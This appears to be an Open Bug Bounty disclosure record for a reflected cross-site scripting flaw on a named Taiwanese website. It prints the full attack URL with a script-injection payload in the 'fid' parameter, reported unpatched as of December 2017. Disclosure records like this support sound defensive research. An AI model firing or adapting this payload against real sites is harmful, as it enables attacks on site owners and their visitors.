hunyi.com.tw XSS vulnerability

2017-09-26T09:46:00
ID OBB:313007
Type openbugbounty
Reporter xssbuddy
Modified 2017-12-25T10:23:00

Description

Vulnerable URL:
http://www.hunyi.com.tw/initial.php?fid=04%22%27--!%3E%3Cscript%3Ealert('OPENBUGBOUNTY')%3C/Script%3E%3C!--&page;_name=product_search&sorder;=Prod_Color&pageNo;=46&maxPageNo;=2&search;_field=prod_name&search;_key=〈=english&clang;=EN#
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 11410922
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 September, 2017 09:46 GMT
Generic security notifications sent to website owner| 26 September, 2017 09:49 GMT
Vulnerability details disclosed by researcher| 25 December, 2017 10:23 GMT